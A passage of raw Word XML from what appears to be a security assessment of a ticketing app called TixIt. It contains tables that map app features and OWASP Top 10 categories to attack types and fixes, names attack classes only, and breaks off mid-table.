          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A327C" w:rsidRPr="003A327C" w14:paraId="30895BDA" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58FD0662"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Sell Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DEAB75D"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 xml:space="preserve">XSS, HTML injection, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>NoSQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A327C" w:rsidRPr="003A327C" w14:paraId="03081B7A" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="209597C8"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Tickets List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25ECA87A"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Reflected/Stored payload display</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A327C" w:rsidRPr="003A327C" w14:paraId="6BA3C5A9" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6912D1E9"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API Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120BD980"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malformed requests, auth bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A327C" w:rsidRPr="003A327C" w14:paraId="65D445F7" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E2CD26"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JWT tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE4DBE3" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>token reuse, session hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2161A0AB" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C"/>
    <w:p w14:paraId="58E75CFA" w14:textId="76F09D01" w:rsidR="00FC5B42" w:rsidRPr="004E318F" w:rsidRDefault="003A327C" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc214584805"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>OWASP Top 10 Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9250" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>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2"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="4394"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="58115D8C" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31EB5005" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B69ADEE" w14:textId="52ACB2B6" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="001A651C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>In</w:t>
            </w:r>
            <w:r w:rsidR="003A327C" w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003A327C" w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TixIt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10423C56" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Attack Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="2EE3E275" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D3EA771" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A01: Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57AA5CE3" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBA4B34" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Changing password without verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="05332A19" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777370CD" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A02: Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22BB618F" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="099A72CF" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak password hashing (fixed via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>bcrypt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="665A8277" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16E2ABB8" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A03: Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10E272E2" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A5E150D" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>NoSQL injection attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="45876936" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="394BFAE7" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A04: Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E54A6F" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="216547FD" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Missing rate-limits originally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="2DA99DA8" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76DC0E36" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">A05: Security </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Misconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="731A2666" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D400FC4" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CORS/CSP originally weak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="4250A9D5" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F120C7F" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A07: Identification &amp; Auth Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52765581" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20BB08E3" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Login brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="2E0FE629" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B902127" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A08: Software &amp; Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5354A7AA" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Minimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4349" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71B0FE12" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A327C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="003A327C" w14:paraId="06AE8083" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3677" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32FD82D8" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="003A327C">
            <w:pPr>
